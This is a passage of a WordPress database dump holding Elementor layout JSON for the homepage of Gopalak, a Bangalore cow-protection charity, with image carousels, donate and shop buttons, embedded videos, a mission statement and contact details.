\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11192,1864,'_elementor_page_assets','a:0:{}'),(11193,1865,'_elementor_edit_mode','builder'),(11194,1865,'_elementor_template_type','wp-page'),(11195,1865,'_elementor_version','3.7.8'),(11196,1865,'_wp_page_template','elementor_canvas'),(11197,1865,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\